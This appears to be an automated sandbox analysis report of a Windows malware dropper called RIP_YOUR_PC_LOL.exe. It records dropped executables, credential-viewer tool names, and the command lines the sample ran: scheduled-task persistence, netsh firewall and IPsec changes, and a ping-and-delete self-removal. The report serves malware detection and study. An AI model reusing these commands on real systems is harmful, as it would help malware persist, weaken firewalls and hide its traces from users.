GPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereiudxamcsyuasdx.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStub.exe" vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehealastounding.exe4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefoampounding.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamereiudxamcsyuasdx.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe" vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehealastounding.exe4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameactive_desktop_launcher.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696291372.0000000004350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamebaseline.dll4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreeeim.exe vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameactive_desktop_launcher.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388706064.0000000005956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamereiudxamcsyuasdx.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696344828.00000000046D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebaseline.dll4 vs RIP_YOUR_PC_LOL.exe
                    Source: 8f1c8b40c7be588389a8d382040b23bb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: a.exe.4.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                    Source: Opus.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.995233050847
                    Source: a.exe.4.drStatic PE information: Section: ZLIB complexity 1.00057768486
                    Source: a.exe.4.drStatic PE information: Section: ZLIB complexity 1.021484375
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile created: C:\Users\user\AppData\Roaming\healastounding.exeJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@84/32@48/5
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Pluto Panel.exe.0.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: test.exe.4.dr, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: test.exe.4.dr, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\AppData\Roaming\Opus.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
                    Source: RIP_YOUR_PC_LOL.exeVirustotal: Detection: 63%
                    Source: RIP_YOUR_PC_LOL.exeMetadefender: Detection: 33%
                    Source: RIP_YOUR_PC_LOL.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe "C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe"
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe"
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Opus.exe C:\Users\user\AppData\Roaming\Opus.exe 0
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\\svchost.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Local\Temp\svchos.exe C:\Users\user\AppData\Local\Temp\\svchos.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\TXPlatforn.exe C:\Windows\SysWOW64\TXPlatforn.exe -auto
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k " "
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul
                    Source: C:\Windows\SysWOW64\TXPlatforn.exeProcess created: C:\Windows\SysWOW64\TXPlatforn.exe C:\Windows\SysWOW64\TXPlatforn.exe -acsi
